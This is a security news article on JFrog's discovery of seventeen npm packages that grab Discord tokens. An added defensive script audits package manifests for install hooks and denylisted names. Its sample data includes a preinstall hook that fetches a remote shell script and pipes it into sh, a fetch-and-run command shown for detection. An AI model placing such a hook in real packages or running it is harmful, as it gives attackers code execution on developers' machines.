Seventeen malicious packages targeting Discord users have been discovered in the open source Node.js package manager repository, according to new research by DevOps automation vendor JFrog.
In a blog post published Wednesday, JFrog security researchers Andrey Polkovnychenko and Shachar Menashe detailed how the malicious NPM packages took aim at the popular communications platform with malware and infostealers, including Discord token grabbers; stealing a user’s token would give a threat actor complete control over the user’s account.
JFrog hypothesized in its blog post that threat actors could use Discord tokens — and by extension, the attached account — for botnets, spreading malware and reselling stolen accounts if the users have Discord’s premium Nitro service.
Menashe told SearchSecurity the packages were discovered through routine scanning of the NPM repository.
“We are continually running our malicious code scanners on popular package repositories, including npm,” Menashe said in an email. “The malicious packages were flagged by our scanners, and we later verified manually that these are indeed malicious packages and did a full assessment of the impact. You can see that we have also disclosed several packages which aren’t related to Discord (prerequests-xcode, ‘wafer-*’ packages, and more).”
Cybercriminals targeting the popular communication platform is not a new phenomenon. A report from Cisco earlier this year described both token stealing and malware delivery via file attachments. Sophos, similarly, released research in July about how threat actors are targeting Discord users with malware.
The malicious packages referenced in JFrog’s blog were discovered in the NPM repository. Node.js is an open source JavaScript runtime environment used by a number of major enterprises, including Discord.
Polkovnychenko and Menashe warned that threat actors’ use of open source repositories for malware hosting is an ongoing trend.
“We are witnessing a recent barrage of malicious software hosted and delivered via open-source software repositories,” the blog read. “Public repositories have become a handy instrument for malware distribution: the repository’s server is a trusted source, and communication with it does not raise the suspicion of any antivirus or firewall. In addition, the ease of installation via automation tools such as the npm client provides a ripe attack vector.”
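The passage above describes why an install from a public repository is a ripe vector: the npm client will run whatever install-time lifecycle scripts a dependency declares, and the download itself looks like trusted traffic. The following script is an added example, not code from JFrog or the article, that audits a set of package manifests for that pattern from the defender's side. It flags install hooks, hooks that appear to fetch and run remote code (a rough heuristic, assumed here rather than taken from the research), and package names on a denylist seeded with the two names the article mentions (prerequests-xcode, wafer-*). The manifests in the block are constructed for the example and are not the malicious packages themselves.

```javascript
// Added example (not the article's or JFrog's code): audit npm package
// manifests for install-time code execution and denylisted names.

// Names seeded from the packages the article names; extend from your own feed.
const DENYLIST = [/^prerequests-xcode$/i, /^wafer-/i];

// npm runs these hooks automatically during install/uninstall, so a
// dependency that defines one gets code execution on the developer's
// machine or CI runner without anyone calling it.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'preuninstall', 'uninstall', 'postuninstall'];

// Assumed heuristic for hooks that download and run something from the
// network; a coarse signal to triage, not a precise detector.
const REMOTE_FETCH = /\b(curl|wget|Invoke-WebRequest|powershell|node\s+-e)\b/i;

// Returns a list of findings for one package.json-style object.
function auditManifest(manifest) {
  const findings = [];
  const name = manifest.name || '(unnamed)';
  if (DENYLIST.some((re) => re.test(name))) {
    findings.push({ name, kind: 'denylisted-name', detail: name });
  }
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const cmd = String(scripts[hook]);
    findings.push({ name, kind: 'install-hook', detail: `${hook}: ${cmd}` });
    if (REMOTE_FETCH.test(cmd)) {
      findings.push({ name, kind: 'remote-fetch', detail: `${hook}: ${cmd}` });
    }
  }
  return findings;
}

// Audits every manifest in a dependency tree (for example, each
// node_modules/*/package.json parsed into an object).
function auditTree(manifests) {
  return manifests.flatMap(auditManifest);
}

// Tallies findings by kind so a CI gate can decide what blocks a build.
function countByKind(findings) {
  const counts = {};
  for (const f of findings) counts[f.kind] = (counts[f.kind] || 0) + 1;
  return counts;
}

// Constructed sample dependency tree (abbreviated package.json contents).
const SAMPLE_TREE = [
  { name: 'tidy-strings', version: '1.2.0', scripts: { test: 'node test.js' } },
  { name: 'wafer-sample', version: '0.1.0', scripts: { postinstall: 'node setup.js' } },
  { name: 'prerequests-xcode', version: '0.0.0-sample', scripts: {} },
  { name: 'helper-utils', version: '2.0.0',
    scripts: { preinstall: 'curl -s https://example.invalid/bootstrap.sh | sh' } },
];

for (const f of auditTree(SAMPLE_TREE)) {
  console.log(`${f.kind.padEnd(16)} ${f.name}: ${f.detail}`);
}
```

In practice the manifests come from reading each package.json under node_modules (or from the lockfile resolution) before the install step is allowed to run, for instance with `npm install --ignore-scripts` followed by this audit, so hooks are reviewed rather than executed on sight.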
Another example can be found in JFrog research last month, where the researchers discovered Python malware imitating signed Python Package Index (PyPI) traffic. Further, Menashe noted that GitHub decided last month to require two-factor authentication on accounts maintaining popular npm packages.
A Discord spokesperson shared the following statement with SearchSecurity.
“Platform safety is a priority for us,” the spokesperson said. “Discord relies on a mix of proactive scanning — such as antivirus scanning — and reactive reports to detect malware and viruses on our service before they reach users. We also do proactive work to locate and remove communities misusing Discord for this purpose. Once we become aware of these cases or bad actors, we remove the content and take appropriate action on any participants.”
Alexander Culafi is a writer, journalist and podcaster based in Boston.